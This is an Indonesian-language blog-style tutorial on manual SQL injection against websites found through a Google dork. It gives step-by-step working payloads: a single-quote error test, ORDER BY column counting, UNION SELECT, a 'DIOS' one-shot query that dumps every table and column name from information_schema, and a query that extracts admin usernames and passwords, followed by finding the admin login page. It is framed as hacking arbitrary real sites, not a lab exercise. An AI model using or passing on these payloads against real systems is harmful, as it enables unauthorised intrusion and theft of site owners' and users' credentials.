sql injection with Dios

Sql injection manual with DIOS

Assalamualaikum, ketemu lagi dengan saya lelaki idaman para women :v kali ini saya akan memberikan tutorial sql injection manual with Dios. 

siapkan: 

1. Dork sebanyak mungkin
2. Browser
3. Dios(dump in One shot)
4. Admin finder
5. Minuman bila haus & makanan bila lapar :v

Ok, langsung saja cuss ke tutorialnya.

Dork dari saya (inurl:news_detail.php?id=)

• Masukkan dorknya ke pencarian
• Lalu pilih target

• Lalu beri tanda petik satu ( http://example.com/news_detail.php?id=12' ) jika muncul tulisan error / blank web berarti web vuln
• Dan saatnya mencari angka table yang vuln menggunakan order by(http://example.com/news_detail?id=12+order+by+1--+-)dan seterusnya hingga menemukan angka table yang vuln
• Jika sudah menemukan angka table yang vuln saatnya mengganti order by dengan union select(http://example.com/news_detail?php.id=-12+union+select+1,2,3,4,5--)urutkan angka table hingga ke angka table yang vuln
• Maka akan muncul angka ajaib jika angka ajaibnya 2 maka ganti angka 2 yang tadi dengan Dios(http://example.com/news_detail.php?id=-12+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5--)maka akan muncul nama table, schema database dan nama coloumn
• Jika sudah muncul misal user & pass adminnya ada di database yang bernama users dan table yang bernama use_ussername & use_pass(http://example.com/news_detail.php?id=-12+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(users)where(@x:=concat+(@x,0x3c62723e,use_username,0x203a3a20,use_pass))))x),3,4,5--)maka akan muncul ussername dan password milik admin.
• Dan selanjutnya tinggal cari admin log-in menggunakan admin finder.

Sekian dari saya ucapkan mohon maaf bila ada salah kata bila ada yang kurang boleh ditambahkan